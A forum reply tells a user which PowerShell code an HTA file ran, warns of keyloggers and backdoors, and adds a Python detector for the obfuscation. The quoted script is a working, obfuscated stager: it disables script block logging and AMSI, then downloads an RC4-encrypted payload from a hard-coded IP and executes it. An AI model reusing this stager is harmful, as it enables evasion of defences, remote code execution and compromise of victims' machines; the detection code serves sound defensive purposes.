RE:Malware

If you executed the hta file it ran this PowerShell code:
If($PSVeRsiOnTABLE.PSVerSIOn.MAJOr -gE 3){$GPF=[REf].ASsEMbLY.GEtTYPe('System.Management.Automation.Utils')."GetFIE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GETVAlUe($nUlL);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAl=[COLLEctioNs.GenerIC.DiCtIOnArY[StRiNg,SystEm.ObjEcT]]::nEW();$val.ADd('EnableScriptB'+'lockLogging',0);$VaL.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$vaL}ElSe{[ScrIPTBLocK]."GEtFIE`lD"('signatures','N'+'onPublic,Static').SeTVaLUE($NUlL,(NEW-OBJect COllecTiOns.GENeRic.HAShSEt[sTrIng]))}[Ref].ASSEmBlY.GEtTyPe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIeld('amsiInitFailed','NonPublic,Static').SEtVALUE($nUlL,$trUe)};};[SysTeM.NET.SERViCEPoiNTManaGER]::EXPect100COnTiNue=0;$Wc=NEw-ObJEcT SystEM.NeT.WebCliEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeADers.ADD('User-Agent',$u);$Wc.ProxY=[SYstEM.NeT.WeBREQueST]::DEfAUlTWebPRoXY;$Wc.PRoXy.CreDeNTiALs = [SYSTEm.NEt.CREDeNTIAlCaChE]::DEFAULtNEtworkCreDenTIALS;$Script:Proxy = $wc.Proxy;$K=[SyStem.TeXt.ENCoDiNg]::ASCII.GetBYTes('(MW5V=Fhxkt2[<yj}:64,cRS&Cf{/T^3');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXor$S[($S[$I]+$S[$H])%256]}};$ser='https://31.41.220.9:80';$t='/login/process.php';$wc.HeadErs.AdD("Cookie","session=HFehNkrb97PGKURkEt72wLnPvb0=");$data=$WC.DoWnloAdDAta($sER+$t);$iv=$daTA[0..3];$daTa=$DAta[4..$data.LEnGth];-JoiN[Char[]](& $R $data ($IV+$K))|IEX
If it was a reverse-http hack then a black hat could have installed a keylogger onto your machine and now knows your password. They likely would have installed a backdoor so that they can access your machine after you reboot. Scan your system!
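
An added example, not part of the original post: a small Python check that flags the behaviours visible in the script above (script block logging tampering, AMSI tampering, download piped to IEX) even when the strings are case-mangled, split with `'+'` or broken up with backticks. The function names, indicator labels and both sample strings are constructed for illustration.

```python
import re

# Indicators drawn from the script quoted above, in normalised form
# (lower-case, backticks removed, quoted string concatenations joined).
INDICATORS = {
    "script_block_logging_tamper": r"cachedgrouppolicysettings|enablescriptblocklogging",
    "amsi_tamper": r"amsiutils|amsiinitfailed",
    "download_and_execute": r"\.downloaddata\(.*\|\s*iex\b",
}

def normalise(script: str) -> str:
    """Undo the cosmetic obfuscation used in the quoted code."""
    s = script.lower()                         # GEtTYPe -> gettype
    s = s.replace("`", "")                     # "GetFIE`lD" -> "getfield"
    # 'ScriptB'+'lockLogging' -> 'scriptblocklogging'
    return re.sub(r"(['\"])\s*\+\s*\1", "", s)

def scan(script: str) -> list[str]:
    """Return the sorted names of all indicators found in the script text."""
    s = normalise(script)
    return sorted(n for n, pat in INDICATORS.items() if re.search(pat, s, re.S))

# Constructed, non-working fragments that reuse the obfuscation style above.
SAMPLE_OBFUSCATED = (
    "$p['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
    "[Ref].ASSEmBlY.GEtTyPe('System.Management.Automation.AmsiUtils')."
    "\"GeTFIe`ld\"('amsiInitFailed','N'+'onPublic,Static');"
    "$d=$Wc.DoWnloAdDAta($u);-JoiN[Char[]]$d|IEX"
)
SAMPLE_BENIGN = (
    "$wc=New-Object System.Net.WebClient;"
    "$wc.DownloadFile('https://example.com/a.zip','a.zip')"
)

if __name__ == "__main__":
    for name, text in (("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)):
        print(name, scan(text))
```

A plain substring search for `EnableScriptBlockLogging` misses the obfuscated sample, which is why the text is normalised before matching.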